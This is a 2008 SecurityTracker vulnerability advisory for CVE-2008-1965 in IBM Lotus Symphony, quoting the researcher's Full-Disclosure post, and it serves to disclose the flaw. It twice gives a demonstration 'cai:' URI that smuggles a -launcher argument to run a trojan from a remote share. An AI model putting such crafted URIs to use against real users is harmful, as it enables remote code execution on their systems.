IBM Lotus Symphony URI Handler Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1019951 |
|
SecurityTracker URL: http://securitytracker.com/id/1019951
|
|
CVE Reference:
CVE-2008-1965
(Links to External Site)
|
Updated: May 19 2008
|
Original Entry Date: Apr 30 2008
|
Impact:
Execution of arbitrary code via network, User access via network
|
Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): Beta 4
|
Description:
A vulnerability was reported in IBM Lotus Symphony. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create a specially crafted 'cai:' URI that, when loaded by the target user, will execute arbitrary code on the target system. The code will run with the privileges of the target user.
The vulnerability resides in the Lotus Expeditor rcplauncher code.
IBM has assigned SPR # PRAD7E2LQ4 to this vulnerability.
A demonstration exploit URI is provided:
cai:"%20-launcher%20\\6.6.6.6\d$\trojan
Thomas Pollet reported this vulnerability.
|
Impact:
A remote user can create URI that, when loaded by the target user, will execute arbitrary code on the target user's system.
|
Solution:
The vendor plans to issue a fix.
The vendor's advisory is available at:
http://www-1.ibm.com/support/docview.wss?uid=swg21303813
|
Vendor URL: www-1.ibm.com/support/docview.wss?uid=swg21303813 (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 24 Apr 2008 15:43:57 +0200
Subject: [Full-disclosure] Lotus expeditor rcplauncher uri handler
|
--===============1952248883==
Content-Type: multipart/alternative;
boundary="----=_Part_464_1669865.1209044637263"
------=_Part_464_1669865.1209044637263
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Hello,
I have found that the lotus expeditor rcplauncher as installed by lotus
symphony and possibly other products, registers a cai: uri handler.
This handler executes
"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe" -config
notes -com.ibm.rcp.portal.app.ui#openCA "%1"
the rcplauncher process accepts various arguments which can be abused to
execute arbitrary code.
The argument to the -launcher option for example is an executable that will
be executed.
malicious uri example:
cai:"%20-launcher%20\\6.6.6.6\d$\trojan
Regards,
Thomas Pollet <http://thomas.pollet.googlepages.com/>
------=_Part_464_1669865.1209044637263
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Hello,<br><br>I have found that the lotus expeditor rcplauncher as installed by lotus symphony and possibly other products, registers
a cai: uri handler.<br>This handler executes<br>"D:\Program Files\IBM\Lotus\Symphony<div id="mb_0">
\framework\rcp\rcplauncher.exe" -config notes -com.ibm.rcp.portal.app.ui#openCA "%1"<br>the rcplauncher process accepts
various arguments which can be abused to execute arbitrary code.<br>The argument to the -launcher option for example is an executable
that will be executed.<br>
<br>malicious uri example:<br>cai:"%20-launcher%20\\<a href="http://6.6.6.6">6.6.6.6</a>\d$\trojan<br><br>Regards,<br><a href="http://thomas.pollet.googlepages.com/">Thomas
Pollet</a><br><br></div><br><br>
------=_Part_464_1669865.1209044637263--
--===============1952248883==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1952248883==--
|
|
